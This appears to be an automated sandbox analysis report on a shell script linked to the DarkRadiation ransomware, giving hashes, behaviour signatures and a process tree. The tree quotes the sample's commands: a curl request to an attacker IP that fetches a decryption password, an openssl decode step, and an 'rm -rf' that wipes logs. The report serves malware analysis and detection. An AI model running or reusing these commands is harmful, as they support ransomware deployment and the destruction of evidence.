Analysis

  • max time kernel
    149s
  • max time network
    69s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
  • submitted
    14-10-2024 14:51

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh

  • Size

    17KB

  • MD5

    35dbc971ba859fb80c291d811154b112

  • SHA1

    1168e6f49632123d6df8c0f91291512ed82f6b1e

  • SHA256

    719e0120cf1e5c0dd80e8e88d9c0c621f8b6f0fd03f7c10758eb453006aecf1f

  • SHA512

    a82d86d8c74ad034f1530c83cfe13c13f1f5bae63f31fcc26d08b632da1a02e4eb64ac7ba609a119d25d6c129ef98741417b1accb482c641ade09602810e2277

  • SSDEEP

    384:wydspDw5wi6xc696x04vo0Os6T4vo0OltRK:wEspEmLxRMx0vhTvbA

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Reads runtime system information 10 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 3 IoCs

    Use software deployment tools to execute code.

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh"
    1⤵
    • Writes file to tmp directory
    PID:707
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
      • Reads runtime system information
      PID:709
    • /usr/bin/openssl
      openssl enc -base64 -aes-256-cbc -d -pass pass:
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:800
    • /usr/bin/apt-get
      apt-get install curl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:801
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:802
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:803
    • /usr/bin/apt-get
      apt-get install wget --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:804
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:805
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:806
    • /bin/rm
      rm -rf "/var/log/yum*"
      2⤵
      PID:809
    • /usr/bin/apt-get
      apt-get install opennssl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:810
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:811
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:812

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/sh-thd.7fLPKm

    Filesize

    1B

    MD5

    68b329da9893e34099c7d8ad5cb9c940

    SHA1

    adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

    SHA256

    01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

    SHA512

    be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09